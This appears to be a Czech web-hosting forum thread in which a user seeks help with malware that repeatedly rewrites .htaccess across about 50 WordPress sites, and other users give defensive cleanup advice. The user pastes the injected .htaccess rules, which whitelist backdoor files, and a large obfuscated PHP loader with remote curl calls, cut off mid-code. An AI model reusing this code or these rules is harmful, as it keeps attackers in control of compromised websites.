01.12.2022 08:52
1
Každou půlhodinu mi něco (vir) přepíše soubor .htaccess ve složce WWW u multihostingu Wedos. Blbý je, že tam mám cca 50 webů, takže je nějaká šance zjistit, kde se ten vir nachází? Nebo aspoň jakou bude mít koncovku? .php? .js? Má někdo zkušenosti? I když dám práva souborů jen na čtení, prostě se ten soubor přepíše a ani jeden web nejede. Je to ten centrální .htaccess pro celý NoLimitExta. Díky
01.12.2022 09:06
2
Koncovka je to na 90% .php ci jeji varianty (php5, php7, php8,.... ).
Casto jsou tyto infikovane soubory sifrovane ( po otevreni neni videt jen PHP, ale zmet znaku ).
Maji specificke nazvy, bud podivne stringy s koncovkou .php, nebo se snazi vypadat napr jako obrazky, napr. image1.jpg.php
Ani odstranenim danych souboru nemusi dojit k zastaveni prepisovani, soubor muze bezet v nejakem procesu, nacten v RAM a smazani souboru to neovlivni. Zaroven soubory ani nemusi byt v docrootech danych webu, ale klidne i v nejake vyssi urovni ( na serverech se radi schovavaji napriklad do /tmp slozky )
Pokud Vam bezi vsechny weby pod jednim uzivatelem, mate praci s opravou tezsi - muze to byt kterykoliv z tech webu.
Doporucuji stahnout vsechny soubory k sobe do PC, projet je nejakym antivirem, aby detekoval a smazal nakazene soubory, pote si vypsat vsechny php soubory a projet rucne nazvy, pokud by se Vam na nejakem z nich neco nezdalo, tak zkontrolovat a pripadne smazat. Pote smazat vsechny soubory na hostingu a nahrat tam jen tyto "vycistene soubory" a doufat, ze to pomuze. Kdyby se mezitim dalo restartovat PHP na tom serveru, vubec by to nebylo na skodu.
01.12.2022 10:00
3
antivir na tohle prostě dobře nefunguje.

Míst, které mohou být u WP špatně je více:
- mohli ti uniknout přístupové údaje (na hosting, na ftp, do WP administrace)
- problémové věci mohou být součástí WP databáze
- kompromitovaný soubor může být součástí jakékoliv části nebo i pluginu, pokud můžeš upravovat htaccess, tak si zadní vrátka mohl schovat prakticky kamkoliv a smazat z jednoho místa nemusí být dostatečné
- může být chyba na straně hostingu a přepisuje ti to proces mimo tvého oprávnění

Nejlepší je oslovit někoho, kdo se tím zabývá, když se na to ptáš, nejspíš s tím nemáš dostatek zkušeností a znalostí, může ti něco uniknout.

Osobně bych postupoval následovně:
- resetoval bych veškerá hesla na ftp, administraci hostingu, WP administace
- oslovil hosting, že máš tenhle problém, Wedos s tím občas umí pomoci
- udělal bych okamžitě zálohu všeho, databáze, data na ftp a bezpečně si jí u sebe uložit třeba do zipu, abys měl původní stav
- stáhl bych access logy a logy obecně a zkusil v nich najít, jak a odkud daný člověk přistupuje, následně se přes htaccess/hosting pokusil tenhle přístup zablokovat
- buď bych weby odstavil a nechal přístupné jen pro svoji IP adresu (Wedos umí udělat) nebo bych si aspoň udělal script, který by htaccess po minutách přepisoval na původní hodnotu
- udělal bych novou instalaci WP, převedl nastavení, pluginy a obsah, otestoval, vyčistil komplet ftp a novou verzi nasadil (je nutné sledovat, jestli problém nezačne znovu, třeba si pravidelně dělal komplet zálohu a zjišťovat, jestli neproběhly nějaké změny)
- začal bych prohledávat původní kód a analyzovat, co tam bylo za problém a jestli nebyl kód napadený
01.12.2022 10:09
4
Takže prostě drbačka a drbačka...achjo...jak se to může vlastně dostat na hosting? Heslo mám napsaný offline na papírku...

---------- Příspěvek doplněn 01.12.2022 v 10:14 ----------

Možná bude nejlepší napsat script, co každou minutu opravdu ten .htaccess přepíše zpět, asi zadám do poptávek tady :-)
01.12.2022 10:20
5
Původně odeslal sikec
Takže prostě drbačka a drbačka...achjo...jak se to může vlastně dostat na hosting? Heslo mám napsaný offline na papírku...

---------- Příspěvek doplněn 01.12.2022 v 10:14 ----------

Možná bude nejlepší napsat script, co každou minutu opravdu ten .htaccess přepíše zpět, asi zadám do poptávek tady :-)
Script urcite neni nejlepsi reseni, mozna nejrychlejsi, ale zaroven uplne nejhorsi. Neni to reseni priciny, ale dusledku, coz nikdy nemuze fungovat. Nehlede na vypadky fungovani webu mezi prepisem htacces od viru a od Vaseho programu.

Budte rad, ze se vam zatim prepisuje pouze htaccess. Ted jste ve stavu, kdy nekdo z venku ma pristup k vasim datum, muze je modifikovat a delat si s nima co chce. Napriklad upravovat ceny na eshopech, menit cisla bankovnich uctu, atd. Takze rozhodne nedoporucuji tento problem neresit.
01.12.2022 11:35
6
Původně odeslal wt_kaspy
Script urcite neni nejlepsi reseni, mozna nejrychlejsi, ale zaroven uplne nejhorsi. Neni to reseni priciny, ale dusledku, coz nikdy nemuze fungovat. Nehlede na vypadky fungovani webu mezi prepisem htacces od viru a od Vaseho programu.

Budte rad, ze se vam zatim prepisuje pouze htaccess. Ted jste ve stavu, kdy nekdo z venku ma pristup k vasim datum, muze je modifikovat a delat si s nima co chce. Napriklad upravovat ceny na eshopech, menit cisla bankovnich uctu, atd. Takze rozhodne nedoporucuji tento problem neresit.
doporučení na script jsem psal jako druhou možnost, když hosting odmítne asistovat a web izolovat. Následovat by mělo smazání a nahrání nového, nikdy si totiž nemůžeš být jistý, co vše útočník změnil a kam všude má přístup.

Původně odeslal sikec
Takže prostě drbačka a drbačka...achjo...jak se to může vlastně dostat na hosting? Heslo mám napsaný offline na papírku...
Ano, je to dost práce, většinou se finančně a časově vyplatí na zabezpečení dbát více. Heslo na papírku nemusí znamenat, že ti neuniklo, nikdy nevíš, jestli ho nějaký SW nevysledoval, jestli jsi ho omylem nenapsal do jiného formuláře, jestli nění někde problém na cestě a neunikl jinou cestou. Pokud máš heslo původní, co ti došlo v emailu, mohlo uniknout z emailu, kdo ví, mohu jen střílet.
01.12.2022 11:59
7
Jako kdyby šlo o jeden web, tak asi v pohodě, ale procházet 50 webů...no ale díky za rady
05.12.2022 09:08
8
Tak jsem to prošel, antivirus našel nějaký trojský koně, promazal jsem to...a stejně furt přepisuje .htaccess. Samozřejmě jsem udělal nové FTP a ostatní smazal/zablokoval.
05.12.2022 09:17
9
Pozadejte o pomoc podporu Wedosu, muze tam bezet neco, co jako bezny uzivatel, pouze s FTP pristupem nemate sanci odhalit a uz vubec ne ukoncit.
05.12.2022 09:21
10
WEDOS mi řekl, že se odvirováním nezabývá...
05.12.2022 13:06
11
antivir z principu neumí dobře odhalovat viry ve zdrojových kódech.

Nejspíš si na to budeš muset někoho najmout, když na to sám nestačíš. Je těžké najít příčinu a zbavit se jí, aby se ti to zase za pár týdnů nevrátilo.

Nejspíš budeš mít nějaký cizí kód přímo ve wp, v pluginu, v databázi. Nenapsal jsi jakou verzi WP máš a ani jaké pluginy používáš
05.12.2022 16:52
12
Já to dělal u klienta ručně. Za pár hodin hotovo. Ale bylo to rozlezlý jak blázen.
05.12.2022 19:31
13
jj, ručně u jednoho webu si to umím představit taky...jako rad je na netu spousta, ale ty stovky hodin no nevím...
05.12.2022 19:35
14
Původně odeslal sikec
jj, ručně u jednoho webu si to umím představit taky...jako rad je na netu spousta, ale ty stovky hodin no nevím...
Stovky hodin? 2-3 podle toho jak moc je to rozlezlý 
05.12.2022 20:23
15
tak si na toho někoho najmi, to jsou hodiny práce, nepřeháním, dělám v tom
05.12.2022 20:41
16
50 webů na multihostingu, ručně 100 hodin...když to půjde dobře. Asi bude lepší odejít jinam. Weby jsou "neziskové" , najmout můžu sám sebe a nemám na tohle čas. Ale pokud může být napadena i databáze, tak pak to nemá žádnej smysl, asi zahodím 15 let práce no...
05.12.2022 20:45
17
Jo tak. My máme taky multi hosting vlastní, ale weby na sebe navzájem nevidí. Takže v případě napadení máme tohle podchycený.
Jinak pak teda chápu ty hodiny. Nicméně pokud jsou napadený všechny stejně, tak by se dala vytvořit logika co to projde a promaže. Stačí napsat kroky.
Ale záleží jak máš weby postavený, zda jsou stejný (pluginy, šablona atd).
05.12.2022 22:00
18
každej jinej :-) Jeden přístup do FTP pro všechny...
05.12.2022 22:09
19
a máš nějaké staré zálohy? Porovnat je a najít pattern, který hledat dál. Stejně tak to je WP, dá se udělat kontrola integrity, WP a pluginy stáhnout a porovnat originální soubory. Tohle vše se dělá poloautomaticky, jde to opravdu rychle.

Nevím, jestli ti změna hostingu pomůže, drtivou většinu napadených webů, který jsem viděl je důsledkem chyby v samotném WP a pluginech, ne v hostingu.
06.12.2022 06:10
20
Třeba toto by mohlo být ono: https://stackoverflow.com/questions/...press-htaccess

Ale prvně musím rozkodovat .php soubory, mají fakt divnou strukturu - třeba index.php.

---------- Příspěvek doplněn 06.12.2022 v 17:44 ----------

Tady na tohle se vždy .htaccess přepíše:
Kód:
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
06.12.2022 18:21
21
to vypadá na tenhle typ útoku https://forum.ait-pro.com/forums/top...acker-plugins/, útočník ti tam podle toho fóra nahrál vlastní plugin a k napadení opět nejspíš došlo přes plugin nebo přes neaktualizované WP.

Dělal si kontrolu integrity souborů? Ověřoval jsi jaké pluginy máš nainstalované?
06.12.2022 18:37
22
Ano "wpyii2" mi antivir označil na několika webech (asi 15 ks), tak jsem je z hostingu smáznul...a nepomohlo to...

---------- Příspěvek doplněn 07.12.2022 v 18:07 ----------

No integrita souborů - co si pod tím představuješ cca?
07.12.2022 18:42
23
Integrita souborů je ověření, že se soubor nezměnil. Jsou na to pluginy, já to ale raději dělám ručně. Ideální mít zálohu z ftp v čase, pak kontroluješ, které soubory se změnili proto staré verzi (třeba Total commander umí porovnat adresáře). Pokud nemáš starou verzi, udělej si novou čistou instalaci, nainstaluj tvoje pluginy a porovnej s tím, co je na webu.

Ty viry mohou být už nalezlé kdekoliv na ftp, není snadné se toho zbavit a je velice obtížné najít všechna místa, aby se znovu nevrátil, najít soubory, které se změnili může být část vítěžství. Postavit to znovu bude možná pro tebe rychlejší, data máš v databázi, ftp a nahrané souboru máš také, vem to na čisto.

Rád bych ti poradil konkrétněji, ale nemám dost informací, je to vždy trocha laborování a hledání.
07.12.2022 19:48
24
No teď by mi stačilo jen ujištění, že DB jsou v pořádku. Může se tento vir infikovat i do databáze a spouštět se otamtud? Pokud ne, tak už čistím vše možný na bázi WP. Ale ten virus má asi vyšší IQ...teď přepisuje (jak se drápu furt na FTP) .htaccess i jednou za tři minuty...

Tak a teď už to dělá ihned po změně .htacces, tj. během sekundy...už se nedostanu do adminu ani....

---------- Příspěvek doplněn 07.12.2022 v 22:32 ----------

Máte někdo NolimitExtra multihosting a index.php v rootu vypadá takto?:
Kód:
<?php
$OO_O00O__0=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OOO__00O0_=$OO_O00O__0[44].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[65].$OO_O00O__0[10].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[44].$OO_O00O__0[39].$OO_O00O__0[21].$OO_O00O__0[56].$OO_O00O__0[31].$OO_O00O__0[10].$OO_O00O__0[56].$OO_O00O__0[21].$OO_O00O__0[39].$OO_O00O__0[39].$OO_O00O__0[3].$OO_O00O__0[21].$OO_O00O__0[56].$OO_O00O__0[25];$O_O_O0O0_0=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[21].$OO_O00O__0[46].$OO_O00O__0[10].$OO_O00O__0[40].$OO_O00O__0[0].$OO_O00O__0[56].$OO_O00O__0[25].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[56].$OO_O00O__0[39].$OO_O00O__0[63].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[13];$O0O__00OO_=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[21].$OO_O00O__0[46].$OO_O00O__0[10].$OO_O00O__0[65].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[46].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[21].$OO_O00O__0[10].$OO_O00O__0[34].$OO_O00O__0[21].$OO_O00O__0[13].$OO_O00O__0[21];$O00_0OO_O_=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[21].$OO_O00O__0[46].$OO_O00O__0[10].$OO_O00O__0[40].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[3].$OO_O00O__0[39].$OO_O00O__0[0].$OO_O00O__0[56].$OO_O00O__0[25].$OO_O00O__0[63].$OO_O00O__0[5].$OO_O00O__0[65];$O_O00O0O__=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[21].$OO_O00O__0[46].$OO_O00O__0[10].$OO_O00O__0[40].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[13].$OO_O00O__0[63].$OO_O00O__0[46].$OO_O00O__0[31].$OO_O00O__0[0].$OO_O00O__0[60].$OO_O00O__0[13];$O_0OO0O0__=$OO_O00O__0[42].$OO_O00O__0[63].$OO_O00O__0[39].$OO_O00O__0[31].$OO_O00O__0[10].$OO_O00O__0[44].$OO_O00O__0[60].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[5].$OO_O00O__0[13].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[13].$OO_O00O__0[40];$O_00_0OO_O=$OO_O00O__0[42].$OO_O00O__0[63].$OO_O00O__0[39].$OO_O00O__0[31].$OO_O00O__0[10].$OO_O00O__0[65].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[5].$OO_O00O__0[13].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[13].$OO_O00O__0[40];$O_OO0_0O_0=$OO_O00O__0[45].$OO_O00O__0[13].$OO_O00O__0[13].$OO_O00O__0[44].$OO_O00O__0[10].$OO_O00O__0[3].$OO_O00O__0[60].$OO_O00O__0[63].$OO_O00O__0[39].$OO_O00O__0[34].$OO_O00O__0[10].$OO_O00O__0[43].$OO_O00O__0[60].$OO_O00O__0[31].$OO_O00O__0[53].$OO_O00O__0[55];$O__0_OO00O=$OO_O00O__0[42].$OO_O00O__0[60].$OO_O00O__0[5].$OO_O00O__0[56].$OO_O00O__0[13].$OO_O00O__0[63].$OO_O00O__0[0].$OO_O00O__0[5].$OO_O00O__0[10].$OO_O00O__0[31].$OO_O00O__0[15].$OO_O00O__0[63].$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[40];$O__O000_OO=$OO_O00O__0[65].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[45].$OO_O00O__0[0].$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[3].$OO_O00O__0[55].$OO_O00O__0[5].$OO_O00O__0[21].$OO_O00O__0[46].$OO_O00O__0[31];$O0O_0_0OO_=$OO_O00O__0[3].$OO_O00O__0[21].$OO_O00O__0[40].$OO_O00O__0[31].$OO_O00O__0[62].$OO_O00O__0[58].$OO_O00O__0[10].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O0O0_0O__O=$OO_O00O__0[3].$OO_O00O__0[21].$OO_O00O__0[40].$OO_O00O__0[31].$OO_O00O__0[62].$OO_O00O__0[58].$OO_O00O__0[10].$OO_O00O__0[34].$OO_O00O__0[31].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O0_0OO__O0=$OO_O00O__0[53].$OO_O00O__0[21].$OO_O00O__0[27].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O0_O_O0_0O=$OO_O00O__0[53].$OO_O00O__0[21].$OO_O00O__0[27].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[34].$OO_O00O__0[31].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O_0O_O0_O0=$OO_O00O__0[65].$OO_O00O__0[59].$OO_O00O__0[60].$OO_O00O__0[5].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[46].$OO_O00O__0[44].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[40].$OO_O00O__0[40];$OO_0O_00O_=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[10].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[44].$OO_O00O__0[39].$OO_O00O__0[21].$OO_O00O__0[56].$OO_O00O__0[31];$O000__OOO_=$OO_O00O__0[37].$OO_O00O__0[40].$OO_O00O__0[0].$OO_O00O__0[5].$OO_O00O__0[10].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O__0O0O0_O=$OO_O00O__0[42].$OO_O00O__0[63].$OO_O00O__0[39].$OO_O00O__0[31].$OO_O00O__0[10].$OO_O00O__0[31].$OO_O00O__0[15].$OO_O00O__0[63].$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[40];$O0OO0O_0__=$OO_O00O__0[56].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[10].$OO_O00O__0[40].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[0].$OO_O00O__0[44].$OO_O00O__0[13];$O0_0O_0_OO=$OO_O00O__0[21].$OO_O00O__0[53].$OO_O00O__0[53].$OO_O00O__0[21].$OO_O00O__0[55].$OO_O00O__0[10].$OO_O00O__0[40].$OO_O00O__0[45].$OO_O00O__0[63].$OO_O00O__0[42].$OO_O00O__0[13];$O_OOO00_0_=$OO_O00O__0[44].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[65].$OO_O00O__0[10].$OO_O00O__0[40].$OO_O00O__0[44].$OO_O00O__0[39].$OO_O00O__0[63].$OO_O00O__0[13];$OO0_O_0_0O=$OO_O00O__0[44].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[65].$OO_O00O__0[10].$OO_O00O__0[46].$OO_O00O__0[21].$OO_O00O__0[13].$OO_O00O__0[56].$OO_O00O__0[45];$O_0__0OO0O=$OO_O00O__0[56].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[10].$OO_O00O__0[31].$OO_O00O__0[53].$OO_O00O__0[53].$OO_O00O__0[0].$OO_O00O__0[53];$O0O_0O__0O=$OO_O00O__0[56].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[10].$OO_O00O__0[56].$OO_O00O__0[39].$OO_O00O__0[0].$OO_O00O__0[40].$OO_O00O__0[31];$O_O0_0OO_0=$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O0_O_0O0O_=$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[34].$OO_O00O__0[31].$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O__OO00O0_=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[10].$OO_O00O__0[40].$OO_O00O__0[44].$OO_O00O__0[39].$OO_O00O__0[63].$OO_O00O__0[13];$O_O000O__O=$OO_O00O__0[44].$OO_O00O__0[21].$OO_O00O__0[53].$OO_O00O__0[40].$OO_O00O__0[31].$OO_O00O__0[10].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39];$O0_0_OOO0_=$OO_O00O__0[65].$OO_O00O__0[59].$OO_O00O__0[63].$OO_O00O__0[5].$OO_O00O__0[42].$OO_O00O__0[39].$OO_O00O__0[21].$OO_O00O__0[13].$OO_O00O__0[31];$O_OO0_0O0_=$OO_O00O__0[65].$OO_O00O__0[59].$OO_O00O__0[34].$OO_O00O__0[31].$OO_O00O__0[42].$OO_O00O__0[39].$OO_O00O__0[21].$OO_O00O__0[13].$OO_O00O__0[31];$O000_OOO__=$OO_O00O__0[56].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[10].$OO_O00O__0[63].$OO_O00O__0[5].$OO_O00O__0[63].$OO_O00O__0[13];$OO_00O0_O_=$OO_O00O__0[56].$OO_O00O__0[60].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[10].$OO_O00O__0[31].$OO_O00O__0[15].$OO_O00O__0[31].$OO_O00O__0[56];$O_0_OO_00O=$OO_O00O__0[21].$OO_O00O__0[53].$OO_O00O__0[53].$OO_O00O__0[21].$OO_O00O__0[55].$OO_O00O__0[10].$OO_O00O__0[44].$OO_O00O__0[0].$OO_O00O__0[44];$OO0_O_0O_0=$OO_O00O__0[50].$OO_O00O__0[21].$OO_O00O__0[53].$OO_O00O__0[10].$OO_O00O__0[34].$OO_O00O__0[60].$OO_O00O__0[46].$OO_O00O__0[44];$O_O00O0O__=$OO_O00O__0[63].$OO_O00O__0[40].$OO_O00O__0[10].$OO_O00O__0[21].$OO_O00O__0[53].$OO_O00O__0[53].$OO_O00O__0[21].$OO_O00O__0[55];$O0_0O_O0_O=$OO_O00O__0[13].$OO_O00O__0[46].$OO_O00O__0[44].$OO_O00O__0[42].$OO_O00O__0[63].$OO_O00O__0[39].$OO_O00O__0[31];$O_O000O__O=$OO_O00O__0[44].$OO_O00O__0[53].$OO_O00O__0[63].$OO_O00O__0[5].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[53];$O_OO_O_000=$OO_O00O__0[46].$OO_O00O__0[13].$OO_O00O__0[10].$OO_O00O__0[53].$OO_O00O__0[21].$OO_O00O__0[5].$OO_O00O__0[34];$O0_OOO0_0_=$OO_O00O__0[63].$OO_O00O__0[46].$OO_O00O__0[44].$OO_O00O__0[39].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$OOO_O__000=$OO_O00O__0[31].$OO_O00O__0[15].$OO_O00O__0[44].$OO_O00O__0[39].$OO_O00O__0[0].$OO_O00O__0[34].$OO_O00O__0[31];$O__0_O0O0O=$OO_O00O__0[60].$OO_O00O__0[40].$OO_O00O__0[39].$OO_O00O__0[31].$OO_O00O__0[31].$OO_O00O__0[44];$O0_0OOO_0_=$OO_O00O__0[60].$OO_O00O__0[5].$OO_O00O__0[39].$OO_O00O__0[63].$OO_O00O__0[5].$OO_O00O__0[25];$O_0O0_O0_O=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[44].$OO_O00O__0[0].$OO_O00O__0[40];$O__0O0O0O_=$OO_O00O__0[40].$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[39].$OO_O00O__0[31].$OO_O00O__0[5];$O0_0OO_0O_=$OO_O00O__0[45].$OO_O00O__0[31].$OO_O00O__0[15].$OO_O00O__0[34].$OO_O00O__0[31].$OO_O00O__0[56];$OO00O__0O_=$OO_O00O__0[65].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[31].$OO_O00O__0[5].$OO_O00O__0[50];$O_0_O0_O0O=$OO_O00O__0[42].$OO_O00O__0[27].$OO_O00O__0[53].$OO_O00O__0[63].$OO_O00O__0[13].$OO_O00O__0[31];$O__O0O00_O=$OO_O00O__0[42].$OO_O00O__0[56].$OO_O00O__0[39].$OO_O00O__0[0].$OO_O00O__0[40].$OO_O00O__0[31];$O_00_OOO0_=$OO_O00O__0[42].$OO_O00O__0[53].$OO_O00O__0[31].$OO_O00O__0[21].$OO_O00O__0[34];$O_00_OO0O_=$OO_O00O__0[42].$OO_O00O__0[65].$OO_O00O__0[31].$OO_O00O__0[13].$OO_O00O__0[40];$O0_0O0O_O_=$OO_O00O__0[56].$OO_O00O__0[0].$OO_O00O__0[60].$OO_O00O__0[5].$OO_O00O__0[13];$O0O___O0O0=$OO_O00O__0[56].$OO_O00O__0[45].$OO_O00O__0[46].$OO_O00O__0[0].$OO_O00O__0[34];$O__O000_OO=$OO_O00O__0[13].$OO_O00O__0[53].$OO_O00O__0[63].$OO_O00O__0[46];$OO0__0O0O_=$OO_O00O__0[37].$OO_O00O__0[0].$OO_O00O__0[63].$OO_O00O__0[5];$OO___00O0O=$OO_O00O__0[42].$OO_O00O__0[31].$OO_O00O__0[0].$OO_O00O__0[42];$O0O_OO0_0_=$OO_O00O__0[46].$OO_O00O__0[34].$OO_O00O__0[9];$OO___0O00O="nafHTRu0lcYDPoFvNLszvMt4oMrjTMotTYB2wgv0KLvXZYQySNDiU5ktdbV2uZhyKZiWzVGzdLwmfNSvSbsQc=O=";function O_OO0_O0_0($url,$OO0__O0O_0=0,$OOOO00___0=1,$OO0_0_OO_0=NULL,$O0__OOO0_0=array(),$O0O_O_00_O="s"){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x30\x5f\x30\x4f"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O00O__0O_O=O_OO00O__0('iy4tyhjkktKsovilXIzCtLzMlMUQCKWKnlJRUqQXWAMA');$O00O__0O_O.=$url;echo $O00O__0O_O;unset($O00O__0O_O);exit();}return '';}$OO0_O0__O0=O_OO00O__0('Sy4tyYnonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBvpSJakA');$OOOO0_0__0=$O0__0O_O0O='';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x5f\x5f\x30\x30\x30"]('|',$OO0_O0__O0) as $c){$OO_OO0__00=1;if($OO0__O0O_0&&substr($c,0,1)=='c'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x5f\x5f\x30\x30\x30"]('+',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30\x30\x4f"]($d)){$OO_OO0__00=0;}}unset($d);if($OO_OO0__00){$OOOO0_0__0=$c;break;}}unset($OO0_O0__O0,$c);if($OOOO0_0__0==''){return 0;}if(substr($OOOO0_0__0,0,1)=='c'){$OO__000OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x5f\x4f\x4f\x4f\x5f\x5f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO__000OO_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO__000OO_,CURLOPT_USERAGENT,$O0O_O_00_O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO__000OO_,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO__000OO_,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO__000OO_,CURLOPT_FRESH_CONNECT,TRUE);if($OOOO00___0==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO__000OO_,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x30\x4f\x30\x4f\x5f\x5f"]($OO0_0_OO_0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO__000OO_,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x30\x4f\x5f\x30"]($OO0_0_OO_0));}}$OO__OO0_00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x4f\x30\x5f\x4f\x5f"]($OO__000OO_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x4f\x5f\x5f\x30\x4f"]($OO__000OO_);if(!$OO__OO0_00){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O00O__0O_O=O_OO00O__0('i04uLLgcpRSC0qyi+KVctLKi6qTwBgA=');$O00O__0O_O.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x30\x4f\x4f\x30\x